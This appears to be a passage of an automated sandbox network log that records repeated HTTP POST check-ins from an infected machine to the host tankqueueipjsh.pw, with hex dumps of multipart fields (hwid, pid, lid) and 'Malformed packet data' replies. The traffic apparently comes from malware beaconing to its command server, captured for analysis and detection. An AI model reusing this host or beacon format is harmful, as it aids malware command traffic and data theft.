                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.833118916 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.184401035 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:22 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=vddrn99fr7f9ch3usjai10pc37; expires=Sun, 31 Mar 2024 07:22:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Za898y4WhxNzi4ApihIr6KpZs%2FMGKDI8JeChzHR9nkA4Smlar5OLP2ZyDv9yeGEvn63w38bDdMVw89vvevr73OlMKTje7DIsUqdkaBrCl4WyXW93UZXT4t%2B6wwPulLhBtMtnBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.184438944 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 36 31 62 39 37 63 38 31 61 35 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e961b97c81a5-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.184473038 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        41192.168.2.550227104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.315332890 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.316168070 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.568751097 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:22 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=jrmvueknilvrgltb2jeo6ssm35; expires=Sun, 31 Mar 2024 07:22:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LVf%2FPlI45iDXeKnhl7vasg4NSH7A8%2FV6KBx8lAjgPMJdTfQUKdozNV3%2B%2BXh4Gv%2F%2BmCHpoUil0zpXodyhczaGrthap87j2fgwAbecwJDvKhKPOpDF8ZvGWRT%2BOY5zWfKbN%2FMZ7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Se
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.568774939 CET130INData Raw: 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 36 34 62 65 62 62 35 38 36 36 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: ver: cloudflareCF-RAY: 8314e964bebb5866-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.568788052 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        42192.168.2.550228104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.668726921 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.669420004 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.010792971 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:22 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=nbnkafkc0h5t2v9te2vad5b8mo; expires=Sun, 31 Mar 2024 07:22:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:22 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yDQ4pZt%2BCCq4zTqrNoiy9JO2gKutwblWMY2rqs%2Fg3n9Sdph6Cm%2FTDR8%2BwnjECuJ8UXN8B%2FnX9dEKpH3TuB00YdZDp1SXsLtTqObTTsIuiOhxtMVeoHipWHBQl2BSsCVvCPclrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server:
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.010817051 CET124INData Raw: 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 36 36 65 62 62 34 33 62 31 38 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: loudflareCF-RAY: 8314e966ebb43b18-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.010831118 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        43192.168.2.550229104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.108941078 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.109110117 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.461707115 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:23 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=4kr3ve5mc6ogp2c560e8j6fpe8; expires=Sun, 31 Mar 2024 07:22:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:23 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:23 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:23 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=171WssAuemSd8F7jnvDFCCMEmAJ%2FUjwMdP2C9pRt4ahPdfg0di0tirMVefrWWAzO15Xsjk%2FKuL1uldI5sJLK1I1y5aRFVpcSVOEc56laVf5WnETAMYOCEZt88GrpTjWC6ut5HQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.461762905 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 36 39 61 63 34 65 30 38 31 33 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e969ac4e0813-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.461800098 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        44192.168.2.550230104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.561366081 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.561754942 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.821069956 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:23 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=c0g4lademmmama6pgo10vb6fak; expires=Sun, 31 Mar 2024 07:22:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:23 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:23 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:23 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wjJXfoUKL1GjtLljYpfGvsf3iRf1uJQllz4SgxE9c58U%2FIRdWqPe8OFoY9KoO%2FQh7G6S8%2Bz5KZw1dbSSAL06Hj2MAV2BVUG4n34VllH2rHupyLnOyaJkrMysxmn8O1D%2F2MwpYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cl
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.821118116 CET122INData Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 36 63 37 65 63 32 32 30 36 34 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: udflareCF-RAY: 8314e96c7ec22064-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.821154118 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        45192.168.2.550231104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.921710968 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.921888113 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.188095093 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:24 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=8dj8h3b2gr2rdnv3o332plm3kb; expires=Sun, 31 Mar 2024 07:22:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:24 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:24 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:24 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FwwIRhDhnZGvepE5yOIIp9hW6XCa6hdYOxUjV%2BC4ERGpEIgPGQEx3Qlt4MdIsm5gAzhzRGF70nGeaGJknmh48ADLuAfh7%2FpdY97L6HRSLv0lOJk4yjMEtOKTy5TKX7S%2F0HyXag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cl
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.188119888 CET122INData Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 36 65 63 64 30 64 36 66 61 66 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: udflareCF-RAY: 8314e96ecd0d6faf-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.188132048 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        46192.168.2.550232104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.286403894 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.286567926 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.634766102 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:24 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=4u9b56cascuhkeavh5ivure88q; expires=Sun, 31 Mar 2024 07:22:03 GMT; Max-Age=9999999; path=/
